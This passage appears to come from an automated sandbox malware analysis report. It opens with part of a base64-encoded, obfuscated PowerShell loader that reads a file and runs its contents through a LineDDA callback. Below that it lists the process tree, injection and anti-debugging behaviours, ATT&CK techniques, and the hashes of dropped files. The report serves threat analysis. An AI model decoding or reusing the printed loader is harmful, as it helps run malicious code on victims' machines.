gBJAFIASwBFAEwASQBHAEgAIABLAG8AbgByAGEAZABpACAATgBvAG4AYwByACAARQByAGEAbgB0AGgAaQBzAHQAcgA2ACAADQAKACQATwBWAEUAUgBMAEUAQQBQAFQANAA9AFsATwBWAEUAUgBMAEUAQQBQAFQAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAE8AVgBFAFIATABFAEEAUABUADIALAAyADEANAA3ADQAOAAzADYANAA4ACwAMQAsADAALAAzACwAMQAyADgALAAwACkADQAKACMAbwB4AHkAYwBoAHIAbwBtAGEAIABEAEEAVQBOAFQARQBSAFMARgAgAHMAZQB5AHQAbwBuAHAAcgBvAGcAIABTAG8AZABkAGkAZQBzAHQAaQAyACAAWQBOAEsARQBOAEgAVQBMAEsAIABTAGkAdgBzAGsAbwBlAG4AZQB1ADkAIABEAGEAbgBkAGkAZgBpACAAUgBhAG4AZwBlAHIAcwBoACAASABhAGwAdgB0AHIAZQBkAHMANQAgAFUAbABpAG4AIABTAE8AVQBUAEgAVwAgAEMAbwBuAGQAeQAgAGIAdQBsAHQAZQByACAARgBSAEEAUwBFAFQASABBACAAVgBpAHQAYQAgAFUATgBEAEUAIABTAFAARQBMAEoAVgBFAE4ARABUACAARQBMAEUAQwAgAFMAawByAG0AaABqAGQANAAgAEwAQQBSAFkATgBHACAAQQBwAHIAaQBsAHYAZQBqAHIAcwAxACAAQQBwAHAAbABpACAAUwBsAGUAdAB0AGUAZgB1AG4AawAgAEYAQQBHAEIARQBWAEcARQBMACAARgBlAG0AbwByAGEANQAgAEQATwBMAEsARQBEAEUAUwBGAFUAIABJAG4AdABoAHIAOQAgAE4AbwBuAGkAbgBzAHQAcgAxACAARABpAHMAbwBjAGMAdQBwAGkAZQAgAE8AVQBUAFIATwBXAEUARABFACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAG8AcgBrAGoAYQA0ACIAIAANAAoAJABPAFYARQBSAEwARQBBAFAAVAA1AD0AMAA7AA0ACgAjAEQAUgBJAEIAQgBMAFkASwBMAEUAIABDAGEAcgBiAGEAbgBpAGwAZwBhADMAIABjAG8AZQBtAGIAIABCAHUAbgBkAGcAYQByADcAIABmAG8AcgBiAHkAZABlAG4AZAAgAFMAYQBuAGsAZQBuAGQAZQBzAHMANgAgAFYAZQBkAGgAbgBnAGUAIABMAGUAYQBuAGUAdgBpAGcAdAAyACAAUABsAGEAbgBmAG8AcgAxACAAbQBvAGsAawBhAGUAIABwAHUAcABpACAARwBhAG0AZQB0AGEAbgAgAEMAbABhAG4AOQAgAEcAUgBZAEQARQBTAFQARQBHACAAVQBHAEUATgBLAEUATgBEAEUATAAgAFMARQBWAFIARABJAEcAIABFAG4AYwByAGkAcwAgAE4AbwBuAHYAbwBsAGEAdAAgAFQAaABlAG8AdABlAGMAaAA3ACAAbQBpAGwAagBmAG8AIABQAFIATwBHAFIAQQBNAEgAVQAgAFkAbwB5AG8AcwB1AG4AIABBAGMAYwBsAGkAbQBhAHQAIABsAGEAcgBiAG8AYQAgAEsAQQBPAEwASQBOACAAUwB0AGEAdgA0ACAAQgBFAE4AQQBSAEIARQBKAEQARQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBuAGQAZQB0AGEAcgBtAGEAbAAiACAADQAKAFsATwBWAEUAUgBMAEUAQQBQAFQAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAE8AVgBFAFIATABFAEEAUABUADQALAAkAE8AVgBFAFIATABFAEEAUABUADMALAA2ADcAMwA4ADQALABbAHIAZQBmAF0AJABPAFYARQBSAEwARQBBAFAAVAA1ACwAMAApAA0ACgAjAEsAYQBsAGUAbgBkAGUAcgBtACAAUwBQAE8AUgBUAEwARQBOAEIARQAgAEEAbgB0AGkAcwBwAGkAcgA2ACAAbgBhAHYAbgBlAGYAIABmAG8AcgB0AGkAZgAgAFAAYQBhAHQAdgBpACAAVABvAGwAbABhAGcAZQBzADQAIABTAGEAcABwAGEAbgB3AG8AbwAgAEIAbABpAHMAdABlAHIAbgBlAHIAIABvAHYAZQByACAAVQBOAEkAUQBVAEkAVABZAFAAUgAgAEMAYQBjAG8AcABoAG8AbgBvAHUAMgAgAFMAYwBlAG4AZQByAGkAZQA1ACAARwBlAG4AbwBwADIAIABNAG8AbgB1AG0AZQBuACAAYwBpAHQAaQAgAEgAdQByAHQAaQBnAHIAdQB0AGUAIABOAE8ATgBXAE8AUgBLAEkATgBHACAARgBlAHIAcwAgAEUATgBUAFIARQBQAFQAIABOAEkAQwBPAFQASQBOAEUAQQBOACAARwByAHUAZABnAGUAawBpADQAIABVAE4AQQBEAEoAIABCAHIAbgBlAHIAYQBkACAAVgBlAHIAdABlAHgAZQBzADkAIABwAG8AcwB0AGUAbgB0AHIAaQBlACAAQgBPAE0AQgBFAFMAUABSAE4AIABSAGkAZwBvACAAUwBQAEkAUgBLAEUAIABVAG4AdwBhAHMAaAA1ACAAQQBDAFIAQQAgAFUAbgBkAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGMAYQByAHIAaQBnAGUAZQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMATABVAE0AUgBFAFQAUABQACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIATwBVAEkATABMAE8ATgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAGEAaABjAG8AbgBkACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAZwBvAG4AaQBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEsAbwByAHMAaQBrADkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAZgBqAG8AbABsAGUAcgBpAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwB2AGUAcgBzAHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAVQBEAFMAUABFAEMAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAVABIAFkATABBAEsATwBJACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAaQBvAGUAbgBzAGEANQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAGkAbgBnAGUAZABtAGEAYwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAHkAdgBzAHQAagBsAHMAeQBjACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHoAbwBvAGMAbwAiACAADQAKAFsATwBWAEUAUgBMAEUAQQBQAFQAMQBdADoAOgBMAGkAbgBlAEQARABBACgAMQAwACwAIAAxADEALAAgADEAMgAsACAAMQA0ACwAJABPAFYARQBSAEwARQBBAFAAVAAzACwAIAAwACkADQAKAA0ACgA="
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oumumpsj.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DF0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6DEF.tmp"
4⤵
PID:2008

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1868

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6DF0.tmp
MD5
4ebdb6059d363eba98bc3ae0e9404468

SHA1
9aa7d40a0f753dbf56165411683e112a33269a29

SHA256
178494c9a4bea60ae14832843505a775cf24a0d048b3bde18c2ede1d92684aaa

SHA512
903356e1e71e9d561e91984042dc3406ea6c70fd325561f45114e6d7f67c75575f92cb9025bd44f226b585683dffda1e5945ec97d0bf19e76a2128e8671e1bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Seques.dat
MD5
ef204b39af5569ca2865caf6f0c2fe41

SHA1
ee3a03d5b03fa8de8883a6063318c16b0b878545

SHA256
9628961688094ba0864e8dea29a861895c5a90ff7aaaf86fe3de3404973ba524

SHA512
506b3a15ca5c0b64494e1a717814fdbe1629bc0db5fc6528ff6b31deb6c5356e452cbabc92fe22c7260476909070daab4c7bc72191cc2be5f1976a880c3850cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\oumumpsj.dll
MD5
93bdbe95d20f81fb6662500d49dcc4a4

SHA1
5ccdcafb006d723d4bee7a7634d4ce47a129a8b0

SHA256
778a74e3853beaaf9077d369deaad6d6b88c878453701971e004348412cd68d5

SHA512
ff2313fd35074e233bd62c8b01cb4ec083372423f5ee7c8ddf91475d68faed29bf6c91bfb42cb8561fce3cf4c0dbb48bcb579f6ff05a7a41736d5378af345d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\oumumpsj.pdb
MD5
05afd2ac2aa4a78f0505623707d5fa8a

SHA1
3e64c848b9654b1ae1c77b22d8f68f7359cf9121

SHA256
f8cc4f70447f45f57cd41b2e38f6b2a2c119c6c55088def4b71823e78c7dec87

SHA512
00a12461c3c9dd9b10d3c069f2bc71639b8719c5d1f8f9f097fd5bb9f1d75f649d5d4f218b1430dc50358752c154ebf52782537c7085f2aceae10fd1161920e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6DEF.tmp
MD5
64329083b5340d4c895f8e210d10adb0

SHA1
4637c8e152b2e80e2491d66e4c17afc060f53f1d

SHA256
05a2329b0e62e1b3c0c7cf40ff90018d8dea91b9924c3f43086916bcc73a3b6c

SHA512
9b85abd075ed75a3ee2fed567018a1f8b1dfb462ed3a663e1f10bdeca888e57faa18d7d0a535e5e6031a969d0fd930838f67f8c3641e738a213aa765760686a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oumumpsj.0.cs
MD5
6472ab590b43f49b4ce333658af4f912

SHA1
45c7168a928002a37b98ef5e08f7abfffc7a82fc

SHA256
32419314d78d3ead577299f8fecd591483ac1596be27812aeb08e49b9178f435

SHA512
b08cc4b83953b0ef6be1cb34ddb9d329bfe289f8f0a2a853d2957a9fcce95fbe55fe3b034eb69b4fafe92397db655f558838a9d6a461e8e298c4713dff3bc9e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oumumpsj.cmdline
MD5
cec856ff7f07729eb1d77496667e8044

SHA1
28f812c8b4b1290775f4759caf8dad54aee57baa

SHA256
246d875d74b981ffe82e4ab92263438bd6fe164912745470ff4610e8dafc1e89

SHA512
0eddea18001bb44439bfb0761018ed5eca25c918ddd0a98a3b5c0c157d5e7350b1349cfa5ae1b8f1eaa4bab4c6fdbd8040d10d1786657dbb7d17e648cb13e4f5

Download Submit
memory/1480-59-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1480-68-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/1480-54-0x00000000757C1000-0x00000000757C3000-memory.dmp

Filesize
8KB

Download
memory/1480-58-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1480-57-0x00000000739A0000-0x0000000073F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1480-56-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1480-55-0x00000000739A0000-0x0000000073F4B000-memory.dmp

Filesize
5.7MB

Download
memory/1480-75-0x0000000077120000-0x00000000772A0000-memory.dmp

Filesize
1.5MB

Download
memory/1480-71-0x0000000076F40000-0x00000000770E9000-memory.dmp

Filesize
1.7MB

Download
memory/1480-73-0x0000000077120000-0x00000000772A0000-memory.dmp

Filesize
1.5MB

Download
memory/1868-72-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1868-74-0x00000000001F0000-0x00000000002F0000-memory.dmp

Filesize
1024KB

Download
memory/1868-79-0x0000000076F40000-0x00000000770E9000-memory.dmp

Filesize
1.7MB

Download
memory/1868-80-0x0000000077120000-0x00000000772A0000-memory.dmp

Filesize
1.5MB

Download
memory/1868-81-0x0000000077120000-0x00000000772A0000-memory.dmp

Filesize
1.5MB

Download
memory/2012-62-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing